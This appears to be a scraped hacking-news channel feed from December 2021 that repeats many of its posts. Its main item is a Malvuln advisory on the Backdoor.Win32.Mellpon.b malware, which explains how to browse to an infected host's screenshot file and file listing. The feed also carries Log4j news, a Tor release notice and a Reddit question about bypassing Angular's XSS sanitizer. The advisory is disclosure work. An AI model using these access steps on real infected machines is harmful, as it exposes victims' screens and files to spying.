Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
Backdoor.Win32.Mellpon.b Information Disclosure
https://1.bp.blogspot.com/-oHWy7Hh5Fq0/WWlvjd6DOFI/AAAAAAAAIQk/2SpYZjutgb8xmw4nQNmHjmGkgvDsryz_gCLcBGAs/s1600/h93.png
Backdoor.Win32.Mellpon.b malware suffers from an information leakage vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Backdoor.Win32.Mellpon.b Information Disclosure
https://1.bp.blogspot.com/-oHWy7Hh5Fq0/WWlvjd6DOFI/AAAAAAAAIQk/2SpYZjutgb8xmw4nQNmHjmGkgvDsryz_gCLcBGAs/s1600/h93.png
Backdoor.Win32.Mellpon.b malware suffers from an information leakage vulnerability.
MD5 |
9fb1627230f1b16ea76628ed71fca5e9Download
Discovery / credits: Malvuln - malvuln.com (c) 2021
Original source: https://malvuln.com/advisory/e499a4c359a8cc46e641f39c0ed548f9.txt
Contact: malvuln13@gmail.com
Media: twitter.com/malvuln
Threat: Backdoor.Win32.Mellpon.b
Vulnerability: Remote Unauthenticated Information Disclosure
Description: The malware listens on TCP port 80 and creates a dir named "tanaka" with a file named C.html, the HTML file contains a list of all dirs on the system and their contents. Third-party attackers who can reach an infected system can view the screen dumps taken periodically as well as view all directories and files on the system. The screen dumps are in a JPG file named "~ss.jpg" and can be accessed by URL http://x.x.x.x/~ss.jpg.
Type: PE32
MD5: e499a4c359a8cc46e641f39c0ed548f9
Vuln ID: MVID-2021-0430
Disclosure: 12/16/2021
Exploit/PoC:
1) Open a web browser to the infected host and navigate to C.html or ~ss.jpg.
Screenshots of the infected host.
http://x.x.x.x/~ss.jpg
2) All files and directory contents.
http://x.x.x.x/C.html
2021/10/13 20:24 28131582 C.html
../
C:/
2016/11/21 15:06 DIR $Recycle.Bin/
2018/03/13 15:36 DIR Boot/
2016/11/21 11:28 DIR Documents and Settings/
2021/12/13 20:21 DIR dump/
2017/12/13 20:41 DIR PerfLogs/
2021/12/13 20:17 DIR Program Files/
2021/10/03 20:49 DIR Program Files (x86)/
2021/10/03 21:12 DIR ProgramData/
2018/03/13 00:44 DIR Recovery/
2018/03/13 00:45 DIR System Volume Information/
2018/03/13 00:45 DIR Users/
2021/07/07 21:14 DIR Windows/
2018/03/01 01:53 398082 bootmgr
2017/09/29 08:41 1 BOOTNXT
2018/03/13 00:40 8192 BOOTSECT.BAK
2021/10/12 21:10 671088640 pagefile.sys
2021/10/12 21:10 16777216 swapfile.sys
C:/$Recycle.Bin/
etc...
Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
Backdoor.Win32.Mellpon.b Information Disclosure
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Exploit Collector
TOR Virtual Network Tunneling Tool 0.4.6.9
https://4.bp.blogspot.com/-hg5R_Iy9kqs/WWlu56TnyEI/AAAAAAAAIJM/rTW1_kDHOwg4grZYYDaMUD1TyZ2BewRDQCLcBGAs/s1600/h107.png
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs). This is the source code release.
MD5 |
Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
TOR Virtual Network Tunneling Tool 0.4.6.9
https://4.bp.blogspot.com/-hg5R_Iy9kqs/WWlu56TnyEI/AAAAAAAAIJM/rTW1_kDHOwg4grZYYDaMUD1TyZ2BewRDQCLcBGAs/s1600/h107.png
Tor is a network of virtual tunnels that allows people and groups to improve their privacy and security on the Internet. It also enables software developers to create new communication tools with built-in privacy features. It provides the foundation for a range of applications that allow organizations and individuals to share information over public networks without compromising their privacy. Individuals can use it to keep remote Websites from tracking them and their family members. They can also use it to connect to resources such as news sites or instant messaging services that are blocked by their local Internet service providers (ISPs). This is the source code release.
MD5 |
6a8bb8f6c6f7c6d80a50de8f9f8be8c4Download
Source:packetstormsecurity.com
___________________________
@hacking_Attack
@Hacking_Video
Kitploit
TOR Virtual Network Tunneling Tool 0.4.6.9
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
CISA Issues Emergency Directive on Log4j
The Cybersecurity Infrastructure and Security Agency orders federal agencies to take actions to mitigate vulnerabilities to the Apache Log4j flaw and attacks exploiting it.
___________________________
@hacking_Attack
@Hacking_Video
CISA Issues Emergency Directive on Log4j
The Cybersecurity Infrastructure and Security Agency orders federal agencies to take actions to mitigate vulnerabilities to the Apache Log4j flaw and attacks exploiting it.
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
CISA Issues Emergency Directive on Log4j
The Cybersecurity Infrastructure and Security Agency orders federal agencies to take actions to mitigate vulnerabilities to the Apache Log4j flaw and attacks exploiting it.
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Timely Questions for Log4j Response Now — And for the Future
EXPERT INSIGHT: How to assess your exposure to the vulnerability with a combination of asset inventory, testing, solid information sources, and software bills of materials (SBOMs).
___________________________
@hacking_Attack
@Hacking_Video
Timely Questions for Log4j Response Now — And for the Future
EXPERT INSIGHT: How to assess your exposure to the vulnerability with a combination of asset inventory, testing, solid information sources, and software bills of materials (SBOMs).
___________________________
@hacking_Attack
@Hacking_Video
Dark Reading
Timely Questions for Log4j Response Now — And for the Future
EXPERT INSIGHT: How to assess your exposure to the vulnerability with a combination of asset inventory, testing, solid information sources, and software bills of materials (SBOMs).
Subdomain Takeover Via Flywheel
https://0xelmalky.medium.com/subdomain-takeover-via-flywheel-447a71d77396?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
https://0xelmalky.medium.com/subdomain-takeover-via-flywheel-447a71d77396?source=rss------bug_bounty-5
___________________________
@hacking_Attack
@Hacking_Video
Medium
Subdomain Takeover Via Flywheel
Flywheel is managed WordPress hosting built for designers and creative agencies to build, scale, and manage hundreds of WordPress sites…
Flywheel is managed WordPress hosting built for designers and creative agencies to build, scale, and manage hundreds of WordPress sites…Continue reading on Medium » (https://0xelmalky.medium.com/subdomain-takeover-via-flywheel-447a71d77396?source=rss------bug_bounty-5)
___________________________
@hacking_Attack
@Hacking_Video
___________________________
@hacking_Attack
@Hacking_Video
Medium
Subdomain Takeover Via Flywheel
Flywheel is managed WordPress hosting built for designers and creative agencies to build, scale, and manage hundreds of WordPress sites…
is there anyway to bypass angular xss sanitizer
https://www.reddit.com/r/Pentesting/comments/rioydy/is_there_anyway_to_bypass_angular_xss_sanitizer/
Hello, I am performing a pentest on an application which is using angular 11 in front-end. I get to store an xss into their database. i know that because i find my string the way it is into one of the requests responses. but the display in angular is changing the special chars such as "<" and "&" into & and<. for that my tag is just displayed. is there a way to bypass this ? submitted by /u/GrompyGromp123 (https://www.reddit.com/user/GrompyGromp123)
[link] (https://www.reddit.com/r/Pentesting/comments/rioydy/is_there_anyway_to_bypass_angular_xss_sanitizer/) [comments] (https://www.reddit.com/r/Pentesting/comments/rioydy/is_there_anyway_to_bypass_angular_xss_sanitizer/)
___________________________
@hacking_Attack
@Hacking_Video
https://www.reddit.com/r/Pentesting/comments/rioydy/is_there_anyway_to_bypass_angular_xss_sanitizer/
Hello, I am performing a pentest on an application which is using angular 11 in front-end. I get to store an xss into their database. i know that because i find my string the way it is into one of the requests responses. but the display in angular is changing the special chars such as "<" and "&" into & and<. for that my tag is just displayed. is there a way to bypass this ? submitted by /u/GrompyGromp123 (https://www.reddit.com/user/GrompyGromp123)
[link] (https://www.reddit.com/r/Pentesting/comments/rioydy/is_there_anyway_to_bypass_angular_xss_sanitizer/) [comments] (https://www.reddit.com/r/Pentesting/comments/rioydy/is_there_anyway_to_bypass_angular_xss_sanitizer/)
___________________________
@hacking_Attack
@Hacking_Video
reddit
is there anyway to bypass angular xss sanitizer
Hello, I am performing a pentest on an application which is using angular 11 in front-end. I get to store an xss into their database. i know that...
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
Why Log4j won’t go away: 5 key questions on the bombshell vulnerability
https://cdn-images-1.medium.com/max/1400/1*APaO3klLefUceJ23t93RqA.png
A nasty software flaw reared its head last week, pulling security professionals into an ongoing and high-stakes race against…
Continue reading on README_ »
___________________________
@hacking_Attack
@Hacking_Video
Why Log4j won’t go away: 5 key questions on the bombshell vulnerability
https://cdn-images-1.medium.com/max/1400/1*APaO3klLefUceJ23t93RqA.png
A nasty software flaw reared its head last week, pulling security professionals into an ongoing and high-stakes race against…
Continue reading on README_ »
___________________________
@hacking_Attack
@Hacking_Video
Medium
Why Log4j won’t go away: 5 key questions answered on the bombshell vulnerability
A nasty software flaw reared its head last week, pulling security professionals into an ongoing and high-stakes race against…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
As Etapas de um Pentest
https://cdn-images-1.medium.com/max/1920/1*gdTiGXl4RiucQVpoDkvwFQ.jpeg
O pentest é dividido em várias etapas, para que se consiga adquirir o máximo de informação sobre o alvo, e garantir um ataque mais…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
As Etapas de um Pentest
https://cdn-images-1.medium.com/max/1920/1*gdTiGXl4RiucQVpoDkvwFQ.jpeg
O pentest é dividido em várias etapas, para que se consiga adquirir o máximo de informação sobre o alvo, e garantir um ataque mais…
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
As Etapas de um Pentest
O pentest é dividido em várias etapas, para que se consiga adquirir o máximo de informação sobre o alvo, e garantir um ataque mais…
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
El nuevo malware PseudoManuscrypt infectó más de 35,000 computadoras en 2021
https://cdn-images-1.medium.com/max/1123/0*kPYZp80MpsuBgUgK
PUBLICADO EN 17 DICIEMBRE, 2021 POR DPAB
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
El nuevo malware PseudoManuscrypt infectó más de 35,000 computadoras en 2021
https://cdn-images-1.medium.com/max/1123/0*kPYZp80MpsuBgUgK
PUBLICADO EN 17 DICIEMBRE, 2021 POR DPAB
Continue reading on Medium »
___________________________
@hacking_Attack
@Hacking_Video
Medium
El nuevo malware PseudoManuscrypt infectó más de 35,000 computadoras en 2021
PUBLICADO EN 17 DICIEMBRE, 2021 POR DPAB